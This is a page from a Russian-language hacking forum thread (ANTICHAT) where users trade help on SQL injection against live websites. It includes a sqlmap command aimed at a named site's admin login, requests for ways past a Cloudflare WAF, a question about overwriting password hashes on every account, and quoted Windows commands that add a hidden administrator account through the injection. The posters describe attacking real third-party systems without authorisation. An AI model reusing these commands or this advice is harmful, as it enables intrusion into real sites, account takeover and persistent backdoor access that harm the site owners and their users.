ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #611  
Старый 14.02.2018, 01:52
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от BabaDook  
↑
Не хорошо по ру работать
угу)

Цитата:
Сообщение от BabaDook  
↑
На счёт мод сека, тут надо уже ручками крутить ))
Мирослав же вроде пилил modsecurityzeroversioned.py, не?
 
Ответить с цитированием

  #612  
Старый 14.02.2018, 02:02
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от BabaDook  
↑
Да я не знаю, мне проще руками, sqlmap меня огорчил очень . он не делает то что нужно.
тож не знаю... то я загуглил.

Просто тема как бэ за его продукт - вот я и отписался, для тех пацанов, кто не в курсе!)
 
Ответить с цитированием

  #613  
Старый 14.02.2018, 03:13
The404
Новичок
Регистрация: 09.10.2016
Сообщений: 6
С нами: 5049686

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
↑
Не хорошо по ру работать
sqlmap --random-agent -u '
http://dsm-print.ru/admin/admin.php
' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba
__________________________________________________ ____________________
На счёт мод сека, тут надо уже ручками крутить ))
По RU -да не вреда ради - просто очень инфа нужна - тото я гляжу сдесь половина ветки RU скулями забита....

Запрос не помог - а так если что - извиняюсь...
 
Ответить с цитированием

  #614  
Старый 01.03.2018, 06:08
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Не как не могу раскрутить и за этого убогого WAF

Код:
[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Помогите
 
Ответить с цитированием

  #615  
Старый 01.03.2018, 06:34
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
↑
Не как не могу раскрутить и за этого убогого WAF
Код:
[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Помогите
Тебе лучше в тему Ваши вопросы по уязвимостям обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.
 
Ответить с цитированием

  #616  
Старый 01.03.2018, 08:52
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Цитата:
Сообщение от cat1vo  
↑
Тебе лучше в тему
Ваши вопросы по уязвимостям
обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.
Через sqlmap возможно клауд обойти ?
 
Ответить с цитированием

  #617  
Старый 01.03.2018, 12:33
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
↑
Через sqlmap возможно клауд обойти ?
Waf от CloudFlare можно, он насколько я помню не сильно сложный!
 
Ответить с цитированием

  #618  
Старый 01.03.2018, 13:00
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Цитата:
Сообщение от cat1vo  
↑
Waf от CloudFlare можно, он насколько я помню не сильно сложный!
я со скриптами пытался и не фига
 
Ответить с цитированием

  #619  
Старый 05.03.2018, 19:43
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Есть SQL injection

Права Tru

Как мне поменять хешь на всех акках сразу ? так вообще возможно ?

Или хотя бы на один из любых
 
Ответить с цитированием

  #620  
Старый 08.03.2018, 15:31
dzhim2014
Новичок
Регистрация: 18.10.2013
Сообщений: 3
С нами: 6614966

Репутация: 0
По умолчанию

Цитата:
Сообщение от Siriak  
↑
Все оказалась проще некуда, если у тебя права True
Через sqlmap прописал нового пользователя RDP командами
net user Admin Pass /add
net localgroup administrators Admin /add
хммм... очень интересно а как это заюзать? (если можно . то скрином покажите пожалуйста).
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.